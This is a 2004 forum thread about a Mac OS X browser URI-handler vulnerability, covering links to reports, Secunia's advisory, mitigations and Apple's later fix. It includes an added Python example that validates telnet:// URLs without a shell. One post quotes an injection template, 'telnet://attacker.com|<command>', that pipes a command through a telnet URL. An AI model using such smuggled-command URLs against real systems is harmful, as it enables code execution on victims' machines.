Finally - a serious vulnerability worth worrying a



chrism238
18th May 2004, 07:51 AM
All the bloodthirsty details are available via apple.slashdot.org (http://apple.slashdot.org/article.pl?sid=04/05/17/1646216)

(oops, the last word in the title is 'about')

Chris.

Danamania
18th May 2004, 10:05 AM
Originally posted by chrism238@May 18 2004, 07:51 AM
All the bloodthirsty details are available via apple.slashdot.org (http://apple.slashdot.org/article.pl?sid=04/05/17/1646216)

(oops, the last word in the title is 'about')

Chris.
There *WAS* another one just as bad, in August 2002.

a telnet:// URL could be used to attempt telnetting somewhere, which would create some output, which could then be piped out to any other command

something along the lines of telnet://attacker.com|<command>

That one was discovered one night by a Japanese fellow, and the software update was available 9 hours later. Very cool work there by Apple. A bad bug, but a very good fix.

I've always thought that currently, it's likely any OS size project has at least tens of security holes of various kinds, and the ONLY way to handle them properly is to patch each and every one asap, as soon as they're out. Patching in a stream, instead of saving up for larger security updates every six months. That kind of treatment is absolutely mandatory for a security problem like this.

Here's hoping that software update icon is bouncing away in my dock, soon!

dana
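
Added example (not part of the original thread and not Apple's fix): one way a telnet:// URL handler can avoid the bug class described in the post above is to validate the host and port strictly and build an argument list that is never passed through a shell. The function name telnet_argv and the sample URLs in the test are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# One DNS label: letters, digits, hyphens; must not start or end with a hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def telnet_argv(url):
    """Return an argv list for a telnet:// URL, or raise ValueError.

    The list is meant for subprocess.run(argv) with shell=False, so no
    character in the URL is ever interpreted by a shell.
    """
    parts = urlsplit(url)
    if parts.scheme != "telnet":
        raise ValueError("not a telnet URL")
    # A telnet URL handler only needs host and optional port.
    if parts.username or parts.password or parts.query or parts.fragment:
        raise ValueError("unexpected URL components")
    if parts.path not in ("", "/"):
        raise ValueError("unexpected path")

    host = parts.hostname or ""
    labels = host.split(".")
    if not host or len(host) > 253 or not all(_LABEL.match(l) for l in labels):
        # Rejects '|', ';', spaces and anything else outside hostname syntax.
        raise ValueError("invalid host")

    port = parts.port  # urllib raises ValueError for non-numeric or >65535
    if port is None:
        port = 23
    if port == 0:
        raise ValueError("invalid port")

    return ["telnet", host, str(port)]
```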

Danamania
18th May 2004, 03:55 PM
Originally posted by chrism238@May 18 2004, 07:51 AM
All the bloodthirsty details are available via apple.slashdot.org (http://apple.slashdot.org/article.pl?sid=04/05/17/1646216)

(oops, the last word in the title is 'about')

Chris.
Reading the article about it more carefully, Apple were notified of this one in February 2004, and it was publicised on the 10th May, which is pretty sucky.

dana

stickman67
18th May 2004, 08:06 PM
Originally posted by danamania@May 18 2004, 03:55 PM
Originally posted by chrism238@May 18 2004, 07:51 AM
All the bloodthirsty details are available via apple.slashdot.org (http://apple.slashdot.org/article.pl?sid=04/05/17/1646216)

(oops, the last word in the title is 'about')

Chris.
Reading the article about it more carefully, Apple were notified of this one in February 2004, and it was publicised on the 10th May, which is pretty sucky.

dana
Yes, but there are other manufacturers of OSs (who shall remain nameless :P ) whose idea of a quick response is to release monthly patches on a schedule that is continually being interrupted as more things are found that need patching, which means they can never catch up with the things that they thought originally needed patching, some of which are actually quite serious.

*Phew!*

:lol:

sillydog701
18th May 2004, 11:29 PM
MacCentral (http://maccentral.macworld.com/news/2004/05/17/safari/index.php?redirect=1084861609000) also has a report on this... it appears not just Safari 1.2.1 but also IE 5.2.

stickman67
19th May 2004, 12:21 PM
Originally posted by sillydog701@May 18 2004, 11:29 PM
MacCentral (http://maccentral.macworld.com/news/2004/05/17/safari/index.php?redirect=1084861609000) also has a report on this... it appears not just Safari 1.2.1 but also IE 5.2.
According to Secunia (http://secunia.com/advisories/11622/), who have issued an advisory lifting the vulnerability rating to "Extremely Critical", the problem may go beyond Safari and IE alone: "This has been confirmed on Macintosh OS X using Safari 1.2.1 (v125.1) and Internet Explorer 5.2. Other browsers may also be used as attack vectors." [emphasis added]

They say there is no real fix at this point, but the following strategies can help lower the risk:
Do not visit untrusted web sites.
Rename all URI handlers which are not required.
Do not surf the Internet as a privileged user.

Some of it is just common sense, of course.

Apparently another thing you can do to mitigate risk is to turn off the "Open 'safe' files after downloading" option in Safari's general preferences.

There's also a little app listed at VersionTracker (http://www.versiontracker.com/dyn/moreinfo/macosx/23446) (called Don't Go There GURLfriend! 1.0). I haven't tried it, and am certainly not advocating that you use it (at your own risk, folks!), but feedback at VT suggests it works OK.

mbd
23rd May 2004, 06:59 PM
For anyone who hasn't noticed, Apple has released a security fix for this now - I urge anyone who hasn't installed the security update to do so immediately - it's <1mb and doesn't require a reboot.